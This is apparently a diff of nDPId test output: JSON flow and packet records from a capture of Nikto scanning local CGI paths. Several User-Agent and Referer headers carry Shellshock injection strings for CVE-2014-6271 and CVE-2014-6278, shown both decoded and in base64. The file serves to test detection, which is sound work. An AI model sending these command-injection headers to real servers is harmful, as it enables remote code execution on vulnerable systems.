+01039{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277375,"pkt":"AAAAAAAAAAAAAAAACABFAAEBYRtAAEAG2tl\/AAABfwAAAcUGH5Bwr1nakn6kY4AYAED+9QAAAQEICp1m\/aedZv2nR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277378,"pkt":"AAAAAAAAAAAAAAAACABFAAEBjFVAAEAGr59\/AAABfwAAAcUIH5BgqrSU8g64oYAYAED+9QAAAQEICp1m\/aqdZv2qR0VUIC8gSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277381,"pkt":"AAAAAAAAAAAAAAAACABFAAEKrtxAAEAGjQ9\/AAABfwAAAcUKH5Ddg5Yc5mMQaoAYAED+\/gAAAQEICp1m\/a2dZv2sR0VUIC9hZG1pbi5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277383,"pkt":"AAAAAAAAAAAAAAAACABFAAES8w1AAEAGSNZ\/AAABfwAAAcUMH5A5v8vLlyOw2IAYAED\/BgAAAQEICp1m\/a+dZv2vR0VUIC9hZG1pbmlzdHJhdG9yLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277386,"pkt":"AAAAAAAAAAAAAAAACABFAAEO1qdAAEAGZUB\/AAABfwAAAcUOH5C5aO5oSApQ3oAYAED\/AgAAAQEICp1m\/bKdZv2yR0VUIC9hdXRoTG9naW4uY2dpIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277387,"pkt":"AAAAAAAAAAAAAAAACABFAAEL0qJAAEAGaUh\/AAABfwAAAcUQH5BC7upk6xmcJIAYAED+\/wAAAQEICp1m\/bOdZv2zR0VUIC9iYi1oaXN0LnNoIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277389,"pkt":"AAAAAAAAAAAAAAAACABFAAELgRJAAEAGuth\/AAABfwAAAcUSH5B08bnUX64J5YAYAED+\/wAAAQEICp1m\/bWdZv21R0VUIC9iYW5uZXIuY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
